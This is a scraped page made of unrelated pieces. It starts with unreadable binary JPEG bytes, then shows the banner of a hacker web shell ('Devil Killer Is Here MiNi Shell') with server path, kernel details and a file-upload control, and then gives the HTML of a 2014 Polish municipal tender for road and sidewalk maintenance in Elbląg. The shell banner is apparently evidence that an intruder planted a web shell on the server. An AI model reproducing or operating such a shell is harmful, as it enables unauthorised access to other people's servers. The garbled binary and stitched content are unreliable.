JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140313/84282-N-2014.html

<p class="kh_header"><b>Elbląg: Część 1 Bieżące utrzymanie jezdni na terenie miasta Elbląga Część 2 Bieżące utrzymanie chodników na terenie miasta Elbląga</b><br>
<b>Numer ogłoszenia: 84282 - 2014; data zamieszczenia: 13.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina - Miasto Elbląg , ul. Łączności 1, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 55 235 35 36, 55 239 31 25, faks 55 239 33 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umelblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Część 1 Bieżące utrzymanie jezdni na terenie miasta Elbląga Część 2 Bieżące utrzymanie chodników na terenie miasta Elbląga.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia:Część 1 Bieżące utrzymanie jezdni na terenie miasta Elbląga Część 2 Bieżące utrzymanie chodników na terenie miasta Elbląga
Przedmiot główny:CPV: 45.23.31.41-9 Nazewnictwo wg CPV: Roboty w zakresie konserwacji dróg 2.Zakres zamówienia.
2.1. Zakres zamówienia Części 1. obejmuje: 
1. remonty cząstkowe nawierzchni jezdni:
1.1.bitumicznych: mieszankami mineralno-asfaltowymi na gorąco, mieszankami bitumicznymi na zimno,
1.2. betonowych i kamiennych (materiał Zamawiającego): z kostki brukowej betonowej, płyt ażurowych, płyt drogowych betonowych, kostki kamiennej,
1.3.betonowych i kamiennych (materiał nowy): z kostki brukowej betonowej, płyt ażurowych, płyt drogowych betonowych, kostki kamiennej,
1.4. tłuczniowej,
1.5. brukowcowej,
2. remonty cząstkowe elementów ulic (materiał Zamawiającego): krawężniki, obrzeża,
3. remonty cząstkowe elementów ulic (materiał nowy): krawężniki, obrzeża,
4. naprawa nawierzchni gruntowych.
2.2. Zakres zamówienia Części 2. obejmuje remonty cząstkowe:  
1.nawierzchni chodników betonowych (materiał Zamawiającego): z płyt betonowych 35x35x5 cm, płyt betonowych 50x50x7 cm, kostki brukowej betonowej, 
2. nawierzchni chodników betonowych (materiał nowy): z płyt betonowych 35x35x5 cm, płyt betonowych 50x50x7 cm, kostki brukowej betonowej, 
3. polegające na regulacji urządzeń infrastruktury technicznej,
4. elementów ulic (materiał Zamawiającego): krawężniki, obrzeża,
5. elementów ulic (materiał nowy): krawężniki, obrzeża.
3.Wymagania i warunki wykonania Części 1. zamówienia: 
1) Zamawiający wymaga udzielenia 12 miesięcy gwarancji na remonty cząstkowe nawierzchni jezdni licząc od daty odbioru poszczególnych zleconych robót konserwacyjnych.
2)W przypadku wygrania przetargu i realizacji robót przy udziale podwykonawców, Wykonawca zobowiązany będzie do zawarcia umów z podwykonawcami, zgodnie z postanowieniami art. 143a - 143d ustawy Prawo zamówień publicznych. 
3)Zamawiający nie zastrzega w SIWZ, że część lub całość zamówienia nie może być powierzona podwykonawcom. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.
4) Zamawiający informuje, że przewiduje udzielenie zamówień uzupełniających do 50% zamówienia podstawowego. Przewidywane zamówienia uzupełniające polegać będą na remoncie cząstkowym nawierzchni bitumicznych masą z wykuciem lub bez wykucia. 
5)Zamawiający informuje, że nie przewiduje udzielania zaliczek na poczet wykonania zamówienia.
6)Informacja o przewidywanych zmianach postanowień zawartej umowy w stosunku do treści oferty, na podstawie której Zamawiający dokona wyboru Wykonawcy i warunkach ich dokonania:
Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy:
a. w przypadku zmiany przepisów prawnych dotyczących stawki VAT,
b. zmiany przepisów prawnych na podstawie, których realizowane jest przedmiotowe zamówienie,
c. zmian wewnętrznych struktur organizacyjnych Zamawiającego i Wykonawcy,
d. wystąpienia działania siły wyższej,
e. zmiany osoby kierującej robotami ze strony Wykonawcy.
4.Wymagania i warunki wykonania Części 2. zamówienia: 
1)Zamawiający wymaga udzielenia 24 miesięcy gwarancji na remonty cząstkowe nawierzchni chodników licząc od daty odbioru poszczególnych zleconych robót konserwacyjnych.
2)W przypadku wygrania przetargu i realizacji robót przy udziale podwykonawców, Wykonawca zobowiązany będzie do zawarcia umów z podwykonawcami, zgodnie z postanowieniami art. 143a - 143d ustawy Prawo zamówień publicznych. 
3)Zamawiający nie zastrzega w SIWZ, że część lub całość zamówienia nie może być powierzona podwykonawcom. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.
4)Zamawiający informuje, że nie przewiduje udzielania zaliczek na poczet wykonania zamówienia.
5)Informacja o przewidywanych zmianach postanowień zawartej umowy w stosunku do treści oferty, na podstawie której Zamawiający dokona wyboru Wykonawcy i warunkach ich dokonania:
Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy:
a. w przypadku zmiany przepisów prawnych dotyczących stawki VAT,
b. zmiany przepisów prawnych na podstawie, których realizowane jest przedmiotowe zamówienie,
c. zmian wewnętrznych struktur organizacyjnych Zamawiającego i Wykonawcy,
d. wystąpienia działania siły wyższej,
e. zmiany osoby kierującej robotami ze strony Wykonawcy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Część 1. zamówienia:
Zamawiający informuje, że przewiduje udzielenie zamówień uzupełniających do 50% zamówienia podstawowego. Przewidywane zamówienia uzupełniające polegać będą na remoncie cząstkowym nawierzchni bitumicznych masą z wykuciem lub bez wykucia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.41-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Część 1. zamówienia i Część 2. zamówienia Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 1. zamówienia:
potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ  
Część 2. zamówienia:
potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 1. zamówienia:
Warunkiem udziału w postępowaniu jest wykonanie zgodnie z zasadami sztuki budowlanej i prawidłowe ukończenie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 roboty zlokalizowanej w obszarze zabudowanym o łącznej wartości nie mniejszej niż 300 000,00 zł brutto polegającej na utrzymaniu nawierzchni pasów drogowych w zakresie remontów cząstkowych jezdni.
Przy ocenie spełnienia tego warunku udziału przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunku, tj. ilość wykonanych robót oraz wartość będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
Wartości podane w walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP na dzień odbioru tych robót, podając datę i kurs.
potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ Część 1. zamówienia  oraz dokumentów wymienionych w pkt VI. ppkt 1.2. SIWZ Część 1. zamówienia
Część 2. zamówienia:
Warunkiem udziału w postępowaniu jest wykonanie zgodnie z zasadami sztuki budowlanej i prawidłowe ukończenie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 roboty zlokalizowanej w obszarze zabudowanym o łącznej wartości nie mniejszej niż 40 000,00 zł brutto polegającej na utrzymaniu nawierzchni pasów drogowych w zakresie budowy, przebudowy lub remontu nawierzchni chodników.
Przy ocenie spełnienia tego warunku udziału przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunku, tj. ilość wykonanych robót oraz wartość będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
Wartości podane w walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP na dzień odbioru tych robót, podając datę i kurs.
potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ Część 2. zamówienia  oraz dokumentów wymienionych w pkt VI. ppkt 1.2. SIWZ Część 2. zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 1. zamówienia:
potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ  
Część 2. zamówienia:
potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 1. zamówienia:
Warunkiem udziału w postępowaniu jest dysponowanie co najmniej 1 osobą posiadającą wymagane uprawnienia do kierowania robotami drogowymi.
Wydanie decyzji w sprawie uznania kwalifikacji zawodowych w budownictwie nabytych w państwach członkowskich UE oraz wpis do stosownej izby odbywa się po przeprowadzeniu właściwego postępowania weryfikacyjnego przez odpowiedni organ samorządu zawodowego w Polsce na zasadach określonych w ustawie z dnia 18.03.2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008, nr 63, poz. 394).
potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ Część 1. zamówienia  oraz dokumentów wymienionych w pkt VI. ppkt 1.3. i 1.4. SIWZ  Część 1. zamówi
Część 2. zamówienia:
Warunkiem udziału w postępowaniu jest dysponowanie co najmniej 1 osobą posiadającą wymagane uprawnienia do kierowania robotami drogowymi lub osobą posiadającą wykształcenie odpowiednie do wykonywania robót, np. brukarz, kamieniarz.
Wydanie decyzji w sprawie uznania kwalifikacji zawodowych w budownictwie nabytych w państwach członkowskich UE oraz wpis do stosownej izby odbywa się po przeprowadzeniu właściwego postępowania weryfikacyjnego przez odpowiedni organ samorządu zawodowego w Polsce na zasadach określonych w ustawie z dnia 18.03.2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008, nr 63, poz. 394).
potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ Część 2. zamówienia  oraz dokumentów wymienionych w pkt VI. ppkt 1.3. i 1.4. SIWZ  Część 2. zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 1. zamówienia:
potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ  
Część 2. zamówienia:
potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Część 1. zamówienia
Obowiązek wskazania przez Wykonawcę w wykazie dotyczy robót budowlanych, polegających na wykonaniu robót zlokalizowanych w obszarze zabudowanym polegających na utrzymaniu nawierzchni pasów drogowych w zakresie remontów cząstkowych jezdni.
Część 2. zamówienia
Obowiązek wskazania przez Wykonawcę w wykazie dotyczy robót budowlanych, polegających na wykonaniu robót zlokalizowanych w obszarze zabudowanym polegających na utrzymaniu nawierzchni pasów drogowych w zakresie budowy, przebudowy lub remontu nawierzchni chodników.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Część 1. zamówienia
Oświadczenie w zakresie art. 25 ust. 1 pkt 2 ustawy Prawo zamówień publicznych.
Uwaga: 
a)Treść wymaganego Oświadczenia w zakresie art. 25 ust. 1 pkt 2 ustawy Prawo zamówień publicznych Zamawiający przekazuje na ZAŁĄCZNIKU NR 2a do SIWZ. Oświadczenie należy składać w oryginale dla Części 1. zamówienia. 
b)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane oświadczenie może być złożone przez pełnomocnika w imieniu wszystkich Wykonawców lub przez wszystkich Wykonawców na jednym dokumencie lub przez każdego Wykonawcę odrębnie.
Część 2. zamówienia
Oświadczenie w zakresie art. 25 ust. 1 pkt 2 ustawy Prawo zamówień publicznych.
Uwaga: 
a)Treść wymaganego Oświadczenia w zakresie art. 25 ust. 1 pkt 2 ustawy Prawo zamówień publicznych Zamawiający przekazuje na ZAŁĄCZNIKU NR 2a do SIWZ. Oświadczenie należy składać w oryginale dla Części 2. zamówienia. 
b)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane oświadczenie może być złożone przez pełnomocnika w imieniu wszystkich Wykonawców lub przez wszystkich Wykonawców na jednym dokumencie lub przez każdego Wykonawcę odrębnie.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dotyczy Części 1. Zamówienia i Części 2. zamówienia
Dokumenty stanowiące dowód, że Wykonawca będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności pisemne zobowiązanie podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - w przypadku Wykonawcy polegającego na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Część 1. zamówienia
Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy:
a. w przypadku zmiany przepisów prawnych dotyczących stawki VAT,
b. zmiany przepisów prawnych na podstawie, których realizowane jest przedmiotowe zamówienie,
c. zmian wewnętrznych struktur organizacyjnych Zamawiającego i Wykonawcy,
d. wystąpienia działania siły wyższej.
e. zmiany osoby kierującej robotami ze strony Wykonawcy.
Część 2. zamówienia
Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy:
a. w przypadku zmiany przepisów prawnych dotyczących stawki VAT,
b. zmiany przepisów prawnych na podstawie, których realizowane jest przedmiotowe zamówienie,
c. zmian wewnętrznych struktur organizacyjnych Zamawiającego i Wykonawcy,
d. wystąpienia działania siły wyższej.
e. zmiany osoby kierującej robotami ze strony Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umelblag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Elblągu Departament Organizacji i Nadzoru Referat Zamówień Publicznych pokój 404 82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.03.2014 godzina 09:30, miejsce: Urząd Miejski w Elblągu Departament Organizacji i Nadzoru Referat Zamówień Publicznych pokój 403 82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dotyczy Sekcji II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA 
Część 1. zamówienia: data rozpoczęcia: data udzielenia zamówienia         
data zakończenia: 11 miesięcy od daty udzielenia zamówienia  
Część 2. zamówienia:data rozpoczęcia: data udzielenia zamówienia         
data zakończenia: 10 miesięcy od daty udzielenia zamówienia  
Część 1. zamówienia:
1. Uwaga do oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ:
a)Treść wymaganego Oświadczenia w zakresie art. 22 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przekazuje na ZAŁĄCZNIKU NR 2a do SIWZ. Oświadczenie należy składać w oryginale dla Części 1. zamówienia. 
b)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane oświadczenie może być złożone przez pełnomocnika w imieniu wszystkich Wykonawców lub przez wszystkich Wykonawców na jednym dokumencie lub przez każdego Wykonawcę odrębnie (jeżeli każdy z Wykonawców spełnia warunki udziału samodzielnie).
2. Uwaga do dokumentu wymienionego w pkt VI. ppkt 1.2. SIWZ:
a)Dowodami, o których mowa powyżej są:
-poświadczenie,
-inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
b)W przypadku, gdy podmiotem na rzecz którego roboty budowlane wskazane w wykazie zostały wcześniej wykonane jest Gmina - Miasto Elbląg, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.
c)Wykaz należy sporządzić na druku zgodnie ze wzorem stanowiącym ZAŁĄCZNIK NR 5 do SIWZ WYKAZ ROBÓT dla Części 1. zamówienia. 
